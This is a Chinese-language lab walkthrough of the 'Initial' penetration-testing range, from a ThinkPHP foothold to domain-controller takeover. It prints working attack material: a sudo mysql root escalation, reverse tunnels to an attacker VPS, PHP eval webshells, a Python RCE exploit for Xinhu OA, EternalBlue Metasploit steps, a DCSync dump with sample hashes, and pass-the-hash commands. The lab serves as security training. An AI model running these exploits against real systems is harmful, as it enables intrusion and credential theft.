春秋云镜Initial靶场渗透测试教学文档

靶场概述

Initial靶场是一个难度为简单的内网渗透测试环境，包含一个flag分布在不同的机器上。该靶场涵盖了从外网打点到内网渗透的完整流程，涉及多种常见漏洞利用技术。

外网打点

信息收集

1. 全端口扫描

   • 使用Tscan工具进行扫描，发现开放了SSH(22)和HTTP(80)服务

2. 指纹识别

   • 识别出目标系统使用ThinkPHP框架

漏洞利用

1. ThinkPHP 5.0.23 RCE漏洞
   • 使用集成攻击工具：https://github.com/Lotus6/ThinkphpGUI
   • 成功获取webshell，权限为www-data

权限提升

初始权限检查

id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)

SUID提权尝试

find / -perm -g=s -type f 2>/dev/null
# 未发现可利用的SUID文件

Sudo提权

1. 检查sudo权限：

sudo -l
# 发现可以无密码以root权限执行mysql命令

2. 利用mysql提权：

sudo mysql -e '\! cat /root/flag/f*'

内网渗透

内网信息收集

1. 网络配置检查

ip a
# 发现内网IP: 172.22.1.15/16

2. 使用fscan扫描内网

chmod 777 fscan-gw
./fscan-gw -h 172.22.1.0/24

扫描结果：

• 172.22.1.15:80 (当前机器)
• 172.22.1.2:445 (域控DC01)
• 172.22.1.21:445 (存在MS17-010漏洞的Win7)
• 172.22.1.18:80 (信呼OA系统)

内网隧道搭建

1. 使用iox搭建隧道

   • VPS端：

   chmod 777 iox
   ./iox proxy -l 4444 -l 1080
   

   • 目标机：

   chmod 777 iox
   ./iox proxy -r [VPS_IP]:4444
   

   • 攻击机配置：

   echo "socks5 [VPS_IP] 1080" >> /etc/proxychains4.conf
   

2. 使用chisel搭建隧道

   • VPS端：

   ./chisel server -p 1234 --reverse
   

   • 目标机：

   ./chisel client [VPS_IP]:1234 R:0.0.0.0:9383:socks
   

   • 攻击机配置：

   echo "socks5 [VPS_IP] 9383" >> /etc/proxychains4.conf
   

内网横向移动

1. phpMyAdmin漏洞利用

1. 目录扫描发现phpMyAdmin

   • 使用Tscan扫描发现phpMyAdmin路径

2. 爆破获取账号密码

3. 日志写入Webshell

show variables like 'general%';
set global general_log = ON;
set global general_log_file = '/var/www/html/shell.php';
select '<?php eval($_POST[cmd]);?>';

2. 信呼OA系统利用

1. 弱口令登录

   • admin/admin123

2. RCE漏洞利用

   • 准备webshell文件1.php：

   <?=eval($_POST[1]);?>
   

   • 使用EXP：

   import requests
   session = requests.session()
   url_pre = 'http://172.22.1.18/'
   
   # 登录
   url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
   data1 = {
       'rempass': '0',
       'jmpass': 'false',
       'device': '1625884034525',
       'ltype': '0',
       'adminuser': 'YWRtaW4=',
       'adminpass': 'YWRtaW4xMjM=',
       'yanzm': ''
   }
   r = session.post(url1, data=data1)
   
   # 上传文件
   url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
   r = session.post(url2, files={'file': open('1.php', 'r+')})
   
   # 触发RCE
   filepath = str(r.json()['filepath'])
   filepath = "/" + filepath.split('.uptemp')[0] + '.php'
   id = r.json()['id']
   
   url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
   r = session.get(url3)
   
   # 执行命令
   r = session.get(url_pre + filepath + "?1=system('dir');")
   print(r.text)
   

3. 永恒之蓝(MS17-010)利用

1. 使用Metasploit

proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

2. 获取系统权限后加载kiwi模块

load kiwi
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv"

获取的哈希示例：

502 krbtgt fb812eea13a18b7fcdb8e6d67ddc205b 514
1106 Marcus e07510a4284b3c97c8e7dee970918c5c 512
1107 Charles f6a9881cd5ae709abb4ac9ab87f24617 512
1000 DC01$ 54ed1db3a47a1daf57d32e126e57e322 532
480500 Administrator 10cf89a850fb1cdbe6bb432b859164c8 512
1104 XIAORANG-OA01$ 6453e1d291333aca2bf361933063c99a 4096
1108 XIAORANG-WIN7$ 749114c87a6d02b7961142c18660c8c0 4096

4. 域控攻击(DCSync)

1. 使用crackmapexec进行哈希传递

proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

总结

本靶场渗透流程：

1. 外网ThinkPHP RCE漏洞利用获取初始立足点
2. 通过sudo mysql提权获取root权限
3. 内网信息收集发现多个目标
4. 搭建隧道实现内网穿透
5. 利用phpMyAdmin和信呼OA漏洞横向移动
6. 通过永恒之蓝漏洞获取Windows服务器权限
7. 使用DCSync攻击获取域控权限
8. 最终通过哈希传递获取域控flag

关键知识点：

• ThinkPHP RCE漏洞利用
• MySQL sudo提权
• 内网隧道搭建(iox/chisel)
• phpMyAdmin日志写入Webshell
• 信呼OA RCE漏洞利用
• MS17-010漏洞利用
• DCSync攻击原理与实现
• 哈希传递攻击(PTH)